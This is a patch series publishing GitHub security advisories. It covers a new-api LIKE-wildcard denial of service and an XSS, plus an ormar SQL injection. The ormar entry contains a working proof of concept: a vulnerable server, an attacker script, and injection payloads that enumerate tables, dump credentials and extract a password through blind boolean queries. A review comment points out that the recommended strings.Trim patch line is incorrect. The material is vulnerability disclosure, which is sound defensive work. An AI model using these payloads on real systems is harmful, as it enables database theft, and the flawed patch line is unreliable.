Attacker crafts malicious LIKE patterns using `%` wildcards\n3. Attacker launches concurrent requests (50-200 concurrent)\n4. Database becomes overwhelmed with slow queries\n5. Application memory exhausts from processing large result sets\n6. Legitimate users experience service degradation or complete unavailability\n\n ## Patch Recommendations\n### 1. Escape LIKE Wildcards (Critical)\n```go\nfunc escapeLike(s string) string {\n s = strings.ReplaceAll(s, \"\\\\\", \"\\\\\\\\\")\n s = strings.ReplaceAll(s, \"%\", \"\\\\%\")\n s = strings.ReplaceAll(s, \"_\", \"\\\\_\")\n return s\n}\n\nfunc SearchUserTokens(userId int, keyword string, token string) (tokens []*Token, err error) {\n keyword = escapeLike(keyword)\n token = strings.Trim(token, \"sk-\")\n token = escapeLike(token)\n\n err = DB.Where(\"user_id = ?\", userId).\n Where(\"name LIKE ? ESCAPE '\\\\\\\\'\", \"%\"+keyword+\"%\").\n Where(commonKeyCol+\" LIKE ? ESCAPE '\\\\\\\\'\", \"%\"+token+\"%\").\n Limit(1000).\n Find(&tokens).Error\n return tokens, err\n}\n```\n\n### 2. Add User-Level Rate Limiting\n```go\ntokenRoute.GET(\"/search\",\n middleware.TokenSearchRateLimit(), // 30 req/min per user\n controller.SearchTokens)\n```\n\n### 3. 
Add Query Timeout\n```go\nctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)\ndefer cancel()\nerr = DB.WithContext(ctx).Where(...).Find(&tokens).Error\n```", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/QuantumNous/new-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.8-alpha.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-w6x6-9fp7-fqm4" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/commit/3e1be18310f35d20742683ca9e4bf3bcafc173c5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/QuantumNous/new-api" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/releases/tag/v0.10.8-alpha.10" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-943" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T21:56:47Z", + "nvd_published_at": null + } +} \ No newline at end of file From ee45bba76db51221a79bf3a409dd1a3d880f0973 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:11:55 +0000 Subject: [PATCH 58/77] Publish GHSA-299v-8pq9-5gjq --- .../GHSA-299v-8pq9-5gjq.json | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json diff --git a/advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json b/advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json new file mode 100644 index 0000000000000..54c7a755fb1ba --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json 
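Review bot: In the "Patch Recommendations" snippet carried in `details` for GHSA-w6x6-9fp7-fqm4, `token = strings.Trim(token, "sk-")` treats `"sk-"` as a set of characters, so it strips every leading and trailing `s`, `k` and `-` from the search term instead of removing the literal key prefix, and a fragment that ends in one of those characters is silently shortened before the LIKE match. If dropping the prefix is the intent, the recommended line should read `token = strings.TrimPrefix(token, "sk-")`. The same snippet relies on an `ESCAPE` clause with a backslash literal, and how that literal is quoted differs between database backends, so the advisory would benefit from one sentence naming the backends the clause was checked against; that cannot be confirmed from this hunk.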
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-299v-8pq9-5gjq",
+ "modified": "2026-02-23T22:10:25Z",
+ "published": "2026-02-23T22:10:25Z",
+ "aliases": [
+ "CVE-2026-25802"
+ ],
+ "summary": "New API has Potential XSS in its MarkdownRenderer component",
+ "details": "### Summary\n\nA potential unsafe operation occurs in component `MarkdownRenderer.jsx`, allowing for Cross-Site Scripting(XSS) when the model outputs items containing `\n\n\n\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/QuantumNous/new-api"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.10.8-alpha.9"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/QuantumNous/new-api"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-23T22:10:25Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 131b18951d6e8b9900c6e4e39970c8f9d1dbeae7 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Feb 2026 22:13:41 +0000
Subject: [PATCH 59/77] Publish GHSA-xxh2-68g9-8jqr
---
.../GHSA-xxh2-68g9-8jqr.json | 68 +++++++++++++++++++
1 file changed, 68 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json b/advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json
new file mode 100644
index 0000000000000..c593f3f840e21
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxh2-68g9-8jqr", + "modified": "2026-02-23T22:12:17Z", + "published": "2026-02-23T22:12:17Z", + "aliases": [ + "CVE-2026-26198" + ], + "summary": "ormar is vulnerable to SQL Injection through aggregate functions min() and max()", + "details": "# Report of SQL Injection Vulnerability in Ormar ORM\n\n## A SQL Injection attack can be achieved by passing a crafted string to the min() or max() aggregate functions.\n\n## Brief description\n\nWhen performing aggregate queries, Ormar ORM constructs SQL expressions by passing user-supplied column names directly into `sqlalchemy.text()` without any validation or sanitization. The `min()` and `max()` methods in the `QuerySet` class accept arbitrary string input as the column parameter. While `sum()` and `avg()` are partially protected by an `is_numeric` type check that rejects non-existent fields, `min()` and `max()` skip this validation entirely. As a result, an attacker-controlled string is embedded as raw SQL inside the aggregate function call. Any unauthorized user can exploit this vulnerability to read the entire database contents, including tables unrelated to the queried model, by injecting a subquery as the column parameter.\n\n## Affected versions\n\n```\n0.9.9 - 0.12.2\n0.20.0b1 - 0.22.0 (latest)\n```\n\nThe vulnerable `SelectAction.get_text_clause()` method and the `min()`/`max()` aggregate functions were introduced together in commit `ff9d412` (March 12, 2021) and first released in version **0.9.9**. 
The vulnerable code has never been modified since — `get_text_clause()` is identical in every subsequent version through the latest **0.21.0**.\n\nVersions prior to 0.9.9 do not contain the `min()`/`max()` aggregate feature and are not affected.\n\nThe following uses the latest ormar 0.21.0 as an example to illustrate the attack.\n\n## Vulnerability details\n\nWhen performing an aggregate query, the `QuerySet.max()` method (line 721, `queryset.py`) passes user input to `_query_aggr_function()`. This method creates a `SelectAction` object for each column name. The column string is split by `__` and the last part becomes `self.field_name` — with no validation against the model's actual fields.\n\nThe critical vulnerability is in `SelectAction.get_text_clause()` (line 41-43, `select_action.py`), which directly passes `self.field_name` into `sqlalchemy.text()`:\n\n```python\n#select_action.py line 41-43\ndef get_text_clause(self) -> sqlalchemy.sql.expression.TextClause:\n alias = f\"{self.table_prefix}_\" if self.table_prefix else \"\"\n return sqlalchemy.text(f\"{alias}{self.field_name}\") # unsanitised user input!\n```\n\nThe `apply_func()` method then wraps this raw text clause inside `func.max()`, producing SQL like `max()`. 
Since `sqlalchemy.text()` treats its argument as literal SQL, any subquery or SQL expression injected through the column name will be executed by the database engine.\n\nThe `_query_aggr_function()` method (line 704-719, `queryset.py`) only validates field types for `sum` and `avg`, leaving `min` and `max` completely unprotected:\n\n```python\n#queryset.py line 704-719\nasync def _query_aggr_function(self, func_name: str, columns: List) -> Any:\n func = getattr(sqlalchemy.func, func_name)\n select_actions = [\n SelectAction(select_str=column, model_cls=self.model) for column in columns\n ]\n if func_name in [\"sum\", \"avg\"]: # <-- only sum/avg are checked!\n if any(not x.is_numeric for x in select_actions):\n raise QueryDefinitionError(...)\n select_columns = [x.apply_func(func, use_label=True) for x in select_actions]\n expr = self.build_select_expression().alias(f\"subquery_for_{func_name}\")\n expr = sqlalchemy.select(*select_columns).select_from(expr)\n result = await self.database.fetch_one(expr)\n return dict(result) if len(result) > 1 else result[0]\n```\n\nTo reproduce the attack, you can follow the steps below, using a FastAPI application with SQLite as an example.\n\nNote: The PoC consists of two files provided in the attachments — `poc_server.py` (the vulnerable server) and `poc_attacker.py` (the HTTP-based attacker script).\n

Start the vulnerable application

\n
    \n
  1. Install dependencies:
  2. \n
\n
pip install ormar databases aiosqlite fastapi uvicorn httpx\n
\n
    \n
  1. The vulnerable server (poc_server.py) is based on the official ormar FastAPI example (ormar/examples/fastapi_quick_start.py). The only modification is the addition of a /items/stats endpoint — a common pattern for applications that provide aggregate statistics. This demonstrates that the vulnerability is easily triggered by natural API design.
  2. \n
\n

The server defines three models:

\n
    \n
  • Category and Item — from the official ormar example (unchanged)
  • \n
  • AdminUser — simulates internal data (e.g., an admin_users table) that should NOT be accessible through the public API
  • \n
\n

The vulnerable endpoint:

\n
# Added endpoint: aggregate statistics (VULNERABLE)\n# This is a common and natural pattern — letting users request\n# statistics on different columns. The ormar documentation itself\n# shows: await Book.objects.max(columns=["year"])\n# See: <https://collerek.github.io/ormar/queries/aggregations/>\n\n@app.get("/items/stats")\nasync def item_stats(\n    metric: str = Query("max", description="max or min"),\n    column: str = Query("price", description="Column to aggregate"),\n):\n    """Return aggregate statistics for items."""\n    if metric == "max":\n        result = await Item.objects.max(column)\n    elif metric == "min":\n        result = await Item.objects.min(column)\n    else:\n        return {"error": "Unsupported metric"}\n    return {"metric": metric, "column": column, "result": result}\n
\n

The database contains:

\n\nTable | Data\n-- | --\ncategories | Electronics\nitems | Laptop ($999.99), Phone ($699.99), Tablet ($449.99), Monitor ($329.99)\nadmin_users | root / Sup3r$ecretP@ss! / ak-9f8e7d6c5b4a3210-prod\n  | deploy-bot / ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi / ak-1a2b3c4d5e6f7890-ci\n\n\n

The admin_users table is NOT exposed via any API endpoint.

\n

The attack steps

\n

The PoC requires two terminals:

\n

Terminal 1 — Start the vulnerable server:

\n
python poc_server.py\n
\n

Terminal 2 — Run the attacker script:

\n
python poc_attacker.py\n
\n

The attacker script (poc_attacker.py) sends HTTP requests to the running server. It has NO prior knowledge of the database schema — all information is discovered through the injection. The attacker executes 6 progressive attack stages through the single /items/stats endpoint.

\n

Principle of vulnerability exploitation

\n

1. The attacker confirms injection by sending an arithmetic expression

\n

The attacker sends GET /items/stats?metric=max&column=1+1. The data flow is:

\n
HTTP request: GET /items/stats?metric=max&column=1+1\n    ↓\nitem_stats(metric="max", column="1+1")                # poc_server.py\n    ↓\nItem.objects.max("1+1")                                # queryset.py:721\n    ↓\n_query_aggr_function(func_name="max", columns=["1+1"]) # queryset.py:704\n    ↓\nSelectAction(select_str="1+1", model_cls=Item)          # select_action.py:22\n    ↓\n_split_value_into_parts("1+1")  →  self.field_name = "1+1"\n    ↓\n# min/max skip the is_numeric check (line 709 only checks sum/avg)\n    ↓\nget_text_clause()  →  sqlalchemy.text("1+1")            # select_action.py:43\n    ↓\napply_func(sqlalchemy.func.max)  →  max(1+1)\n
\n

Generated SQL:

\n
SELECT max(1+1) AS "1+1"\nFROM (SELECT items.id AS id, items.name AS name, items.price AS price,\n             items.category AS category\n      FROM items) AS subquery_for_max\n
\n

The API returns {"metric":"max","column":"1+1","result":2}, confirming that the arithmetic expression was evaluated as SQL.

\n

2. The attacker enumerates database tables

\n

The attacker injects a subquery to read sqlite_master:

\n
GET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\n
\n

Which internally calls:

\n
await Item.objects.max(\n    "(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')"\n)\n
\n

Generated SQL:

\n
SELECT max((SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table'))\n       AS "(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')"\nFROM (SELECT items.id, items.name, items.price, items.category\n      FROM items) AS subquery_for_max\n
\n

The API returns categories,admin_users,items, revealing the hidden admin_users table.

\n

3. The attacker extracts the schema of the target table

\n
GET /items/stats?metric=max&column=(SELECT sql FROM sqlite_master WHERE name='admin_users')\n
\n

The API returns the full CREATE TABLE statement, revealing column names: username, password, api_key.

\n

4. The attacker dumps all credentials in a single query

\n
GET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10)) FROM admin_users)\n
\n

Generated SQL:

\n
SELECT max((SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10))\n            FROM admin_users))\n       AS "..."\nFROM (SELECT items.id, items.name, items.price, items.category\n      FROM items) AS subquery_for_max\n
\n

The API returns all credentials:

\n
root | Sup3r$ecretP@ss! | ak-9f8e7d6c5b4a3210-prod\ndeploy-bot | ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi | ak-1a2b3c4d5e6f7890-ci\n
\n

5. Blind boolean-based extraction (when results are not directly visible)

\n

Even if the API does not return query results directly, the attacker can use boolean-based blind injection to extract data character by character using binary search:

\n
GET /items/stats?metric=max&column=CASE WHEN UNICODE(SUBSTR((SELECT password FROM admin_users WHERE username='root'),1,1))>83 THEN 1 ELSE 0 END\n
\n

Which internally calls:

\n
# "Is the Nth character of root's password greater than ASCII code M?"\nawait Item.objects.max(\n    "CASE WHEN UNICODE(SUBSTR("\n    "(SELECT password FROM admin_users WHERE username='root'),1,1))>83 "\n    "THEN 1 ELSE 0 END"\n)\n# Returns 0 → first character is 'S' (ASCII 83)\n
\n

By iterating over each position with binary search, the full password Sup3r$ecretP@ss! is extracted in approximately 113 HTTP requests (16 characters x ~7 binary search steps).

\n

6. The attacker extracts the production API key

\n
GET /items/stats?metric=max&column=(SELECT api_key FROM admin_users WHERE username='root')\n
\n

The API returns: ak-9f8e7d6c5b4a3210-prod

\n

All data was extracted through a single public API endpoint using only unauthenticated GET requests.

\n## Start the vulnerable application\n\n1. Install dependencies:\n\n```bash\npip install ormar databases aiosqlite fastapi uvicorn httpx\n```\n\n1. The vulnerable server (`poc_server.py`) is based on the **official ormar FastAPI example** ([[ormar/examples/fastapi_quick_start.py](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)). The only modification is the addition of a `/items/stats` endpoint — a common pattern for applications that provide aggregate statistics. This demonstrates that the vulnerability is easily triggered by natural API design.\n\nThe server defines three models:\n\n- `Category` and `Item` — from the official ormar example (unchanged)\n- `AdminUser` — simulates internal data (e.g., an admin_users table) that should NOT be accessible through the public API\n\nThe vulnerable endpoint:\n\n```python\n# Added endpoint: aggregate statistics (VULNERABLE)\n# This is a common and natural pattern — letting users request\n# statistics on different columns. The ormar documentation itself\n# shows: await Book.objects.max(columns=[\"year\"])\n# See: \n\n@app.get(\"/items/stats\")\nasync def item_stats(\n metric: str = Query(\"max\", description=\"max or min\"),\n column: str = Query(\"price\", description=\"Column to aggregate\"),\n):\n \"\"\"Return aggregate statistics for items.\"\"\"\n if metric == \"max\":\n result = await Item.objects.max(column)\n elif metric == \"min\":\n result = await Item.objects.min(column)\n else:\n return {\"error\": \"Unsupported metric\"}\n return {\"metric\": metric, \"column\": column, \"result\": result}\n```\n\nThe database contains:\n\n| Table | Data |\n| --- | --- |\n| `categories` | Electronics |\n| `items` | Laptop ($999.99), Phone ($699.99), Tablet ($449.99), Monitor ($329.99) |\n| `admin_users` | root / Sup3r$ecretP@ss! 
/ ak-9f8e7d6c5b4a3210-prod |\n| | deploy-bot / ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi / ak-1a2b3c4d5e6f7890-ci |\n\nThe `admin_users` table is **NOT** exposed via any API endpoint.\n\n## The attack steps\n\nThe PoC requires two terminals:\n\n**Terminal 1** — Start the vulnerable server:\n\n```bash\npython poc_server.py\n```\n\n**Terminal 2** — Run the attacker script:\n\n```bash\npython poc_attacker.py\n```\n\nThe attacker script (`poc_attacker.py`) sends HTTP requests to the running server. It has **NO prior knowledge** of the database schema — all information is discovered through the injection. The attacker executes 6 progressive attack stages through the single `/items/stats` endpoint.\n\n## Principle of vulnerability exploitation\n\n### 1. The attacker confirms injection by sending an arithmetic expression\n\nThe attacker sends `GET /items/stats?metric=max&column=1+1`. The data flow is:\n\n```\nHTTP request: GET /items/stats?metric=max&column=1+1\n ↓\nitem_stats(metric=\"max\", column=\"1+1\") # poc_server.py\n ↓\nItem.objects.max(\"1+1\") # queryset.py:721\n ↓\n_query_aggr_function(func_name=\"max\", columns=[\"1+1\"]) # queryset.py:704\n ↓\nSelectAction(select_str=\"1+1\", model_cls=Item) # select_action.py:22\n ↓\n_split_value_into_parts(\"1+1\") → self.field_name = \"1+1\"\n ↓\n# min/max skip the is_numeric check (line 709 only checks sum/avg)\n ↓\nget_text_clause() → sqlalchemy.text(\"1+1\") # select_action.py:43\n ↓\napply_func(sqlalchemy.func.max) → max(1+1)\n```\n\nGenerated SQL:\n\n```sql\nSELECT max(1+1) AS \"1+1\"\nFROM (SELECT items.id AS id, items.name AS name, items.price AS price,\n items.category AS category\n FROM items) AS subquery_for_max\n```\n\nThe API returns `{\"metric\":\"max\",\"column\":\"1+1\",\"result\":2}`, confirming that the arithmetic expression was evaluated as SQL.\n\n### 2. 
The attacker enumerates database tables\n\nThe attacker injects a subquery to read `sqlite_master`:\n\n```\nGET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\n```\n\nWhich internally calls:\n\n```python\nawait Item.objects.max(\n \"(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\"\n)\n```\n\nGenerated SQL:\n\n```sql\nSELECT max((SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table'))\n AS \"(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\"\nFROM (SELECT items.id, items.name, items.price, items.category\n FROM items) AS subquery_for_max\n```\n\nThe API returns `categories,admin_users,items`, revealing the hidden `admin_users` table.\n\n### 3. The attacker extracts the schema of the target table\n\n```\nGET /items/stats?metric=max&column=(SELECT sql FROM sqlite_master WHERE name='admin_users')\n```\n\nThe API returns the full `CREATE TABLE` statement, revealing column names: `username`, `password`, `api_key`.\n\n### 4. The attacker dumps all credentials in a single query\n\n```\nGET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10)) FROM admin_users)\n```\n\nGenerated SQL:\n\n```sql\nSELECT max((SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10))\n FROM admin_users))\n AS \"...\"\nFROM (SELECT items.id, items.name, items.price, items.category\n FROM items) AS subquery_for_max\n```\n\nThe API returns all credentials:\n\n```\nroot | Sup3r$ecretP@ss! | ak-9f8e7d6c5b4a3210-prod\ndeploy-bot | ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi | ak-1a2b3c4d5e6f7890-ci\n```\n\n### 5. 
Blind boolean-based extraction (when results are not directly visible)\n\nEven if the API does not return query results directly, the attacker can use boolean-based blind injection to extract data character by character using binary search:\n\n```\nGET /items/stats?metric=max&column=CASE WHEN UNICODE(SUBSTR((SELECT password FROM admin_users WHERE username='root'),1,1))>83 THEN 1 ELSE 0 END\n```\n\nWhich internally calls:\n\n```python\n# \"Is the Nth character of root's password greater than ASCII code M?\"\nawait Item.objects.max(\n \"CASE WHEN UNICODE(SUBSTR(\"\n \"(SELECT password FROM admin_users WHERE username='root'),1,1))>83 \"\n \"THEN 1 ELSE 0 END\"\n)\n# Returns 0 → first character is 'S' (ASCII 83)\n```\n\nBy iterating over each position with binary search, the full password `Sup3r$ecretP@ss!` is extracted in approximately 113 HTTP requests (16 characters x ~7 binary search steps).\n\n### 6. The attacker extracts the production API key\n\n```\nGET /items/stats?metric=max&column=(SELECT api_key FROM admin_users WHERE username='root')\n```\n\nThe API returns: `ak-9f8e7d6c5b4a3210-prod`\n\nAll data was extracted through a single public API endpoint using only unauthenticated GET requests.\n## The complete POC\n\n### poc_server.py (Vulnerable Server)\n\nBased on the official ormar FastAPI example ([[fastapi_quick_start.py](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)):\n\n```python\n\"\"\"\nCVE PoC — Vulnerable Server\n=============================\nBased on the OFFICIAL ormar FastAPI example:\n \n\nThe only modification is the addition of a /items/stats endpoint (line 63-76),\nwhich is a common pattern for any application that provides aggregate statistics.\n\nUsage:\n python poc_server.py\n\"\"\"\n\n# ── Original official example code (unchanged) ───────────────\n# Source: ormar/examples/fastapi_quick_start.py\n\nfrom contextlib import 
asynccontextmanager\nfrom typing import List, Optional\n\nimport databases\nimport ormar\nimport sqlalchemy\nimport uvicorn\nfrom fastapi import FastAPI, Query\n\nDATABASE_URL = \"sqlite:///poc_vuln.db\"\n\normar_base_config = ormar.OrmarConfig(\n database=databases.Database(DATABASE_URL), metadata=sqlalchemy.MetaData()\n)\n\nclass Category(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"categories\")\n\n id: int = ormar.Integer(primary_key=True)\n name: str = ormar.String(max_length=100)\n\nclass Item(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"items\")\n\n id: int = ormar.Integer(primary_key=True)\n name: str = ormar.String(max_length=100)\n price: float = ormar.Float(default=0)\n category: Optional[Category] = ormar.ForeignKey(Category, nullable=True)\n\n# This table simulates internal data that should NOT be accessible\n# through the public API — e.g. an admin_users table in the same database.\nclass AdminUser(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"admin_users\")\n\n id: int = ormar.Integer(primary_key=True)\n username: str = ormar.String(max_length=100)\n password: str = ormar.String(max_length=200)\n api_key: str = ormar.String(max_length=200)\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n database_ = ormar_base_config.database\n if not database_.is_connected:\n await database_.connect()\n\n # Create tables\n engine = sqlalchemy.create_engine(DATABASE_URL)\n ormar_base_config.metadata.create_all(engine)\n engine.dispose()\n\n # Seed sample data\n if not await Item.objects.count():\n cat = await Category.objects.create(name=\"Electronics\")\n await Item.objects.create(name=\"Laptop\", price=999.99, category=cat)\n await Item.objects.create(name=\"Phone\", price=699.99, category=cat)\n await Item.objects.create(name=\"Tablet\", price=449.99, category=cat)\n await Item.objects.create(name=\"Monitor\", price=329.99, category=cat)\n\n if not await AdminUser.objects.count():\n await 
AdminUser.objects.create(\n username=\"root\",\n password=\"Sup3r$ecretP@ss!\",\n api_key=\"ak-9f8e7d6c5b4a3210-prod\",\n )\n await AdminUser.objects.create(\n username=\"deploy-bot\",\n password=\"ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi\",\n api_key=\"ak-1a2b3c4d5e6f7890-ci\",\n )\n\n print(\"\\\\n [Server] Ready. Database seeded with items + admin_users.\")\n print(\" [Server] The admin_users table is NOT exposed via any API endpoint.\\\\n\")\n\n yield\n\n if database_.is_connected:\n await database_.disconnect()\n\napp = FastAPI(\n title=\"Item Catalog API\",\n description=\"Based on official ormar FastAPI example\",\n lifespan=lifespan,\n)\n\n# ── Original endpoints from official example (unchanged) ──────\n\n@app.get(\"/items/\", response_model=List[Item])\nasync def get_items():\n items = await Item.objects.select_related(\"category\").all()\n return items\n\n@app.post(\"/items/\", response_model=Item)\nasync def create_item(item: Item):\n await item.save()\n return item\n\n@app.post(\"/categories/\", response_model=Category)\nasync def create_category(category: Category):\n await category.save()\n return category\n\n@app.put(\"/items/{item_id}\")\nasync def get_item(item_id: int, item: Item):\n item_db = await Item.objects.get(pk=item_id)\n return await item_db.update(**item.model_dump())\n\n@app.delete(\"/items/{item_id}\")\nasync def delete_item(item_id: int, item: Item = None):\n if item:\n return {\"deleted_rows\": await item.delete()}\n item_db = await Item.objects.get(pk=item_id)\n return {\"deleted_rows\": await item_db.delete()}\n\n# ── Added endpoint: aggregate statistics (VULNERABLE) ─────────\n# This is a common and natural pattern — letting users request\n# statistics on different columns. 
The ormar documentation itself\n# shows: await Book.objects.max(columns=[\"year\"])\n# See: \n\n@app.get(\"/items/stats\")\nasync def item_stats(\n metric: str = Query(\"max\", description=\"max or min\"),\n column: str = Query(\"price\", description=\"Column to aggregate\"),\n):\n \"\"\"Return aggregate statistics for items.\"\"\"\n if metric == \"max\":\n result = await Item.objects.max(column)\n elif metric == \"min\":\n result = await Item.objects.min(column)\n else:\n return {\"error\": \"Unsupported metric\"}\n return {\"metric\": metric, \"column\": column, \"result\": result}\n\n@app.get(\"/health\")\nasync def health():\n return {\"status\": \"ok\"}\n\n# ── Main ──────────────────────────────────────────────────────\nif __name__ == \"__main__\":\n import os\n # Clean previous database for reproducibility\n if os.path.exists(\"poc_vuln.db\"):\n os.unlink(\"poc_vuln.db\")\n print(\"=\" * 60)\n print(\" CVE PoC — Vulnerable Server\")\n print(\" Based on: ormar/examples/fastapi_quick_start.py\")\n print(\" Added: GET /items/stats?metric=max&column=\")\n print(\" Docs: \")\n print(\"=\" * 60)\n uvicorn.run(app, host=\"127.0.0.1\", port=8000, log_level=\"warning\")\n```\n\n### poc_attacker.py (Attacker Script)\n\n```python\n\"\"\"\nCVE PoC — Attacker Script\n===========================\nExploits the SQL injection in /items/stats endpoint.\nSends HTTP requests to the running FastAPI server.\n\nPrerequisites:\n 1. Start the server first: python poc_server.py\n 2. 
Then run this script: python poc_attacker.py\n\nThe attacker has NO prior knowledge of the database schema.\nAll information is discovered through the injection.\n\"\"\"\n\nimport sys\nimport httpx\n\nTARGET = \"\"\nENDPOINT = \"/items/stats\"\n\ndef inject(payload: str) -> str:\n \"\"\"Send a single injection payload via the public API.\"\"\"\n resp = httpx.get(TARGET + ENDPOINT, params={\"metric\": \"max\", \"column\": payload})\n data = resp.json()\n return data.get(\"result\")\n\ndef main():\n # ── Pre-check ─────────────────────────────────────────────\n try:\n r = httpx.get(TARGET + \"/health\", timeout=3)\n if r.status_code != 200:\n sys.exit(1)\n except httpx.ConnectError:\n print(f\"Cannot connect to {TARGET}\")\n print(f\"Start the server first: python poc_server.py\")\n sys.exit(1)\n\n # ── Stage 0: Legitimate request ──────────────────────────\n result = inject(\"price\")\n print(f\"[Stage 0] Normal usage: max(price) = {result}\")\n\n # ── Stage 1: Confirm injection ────────────────────────────\n result = inject(\"1+1\")\n print(f\"[Stage 1] max('1+1') = {result}\")\n if result == 2:\n print(\" → SQL INJECTION CONFIRMED\")\n\n # ── Stage 2: Enumerate tables ─────────────────────────────\n payload = \"(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\"\n result = inject(payload)\n tables = str(result).split(\",\") if result else []\n print(f\"[Stage 2] Tables: {result}\")\n\n # ── Stage 3: Extract schema ───────────────────────────────\n target_table = [t for t in tables if \"admin\" in t.lower()]\n target_table = target_table[0] if target_table else tables[-1]\n payload = f\"(SELECT sql FROM sqlite_master WHERE name='{target_table}')\"\n result = inject(payload)\n print(f\"[Stage 3] Schema of {target_table}: {result}\")\n\n # ── Stage 4: Dump all credentials ─────────────────────────\n payload = (\n f\"(SELECT GROUP_CONCAT(\"\n f\"username || ' | ' || password || ' | ' || api_key, CHAR(10))\"\n f\" FROM {target_table})\"\n )\n result = 
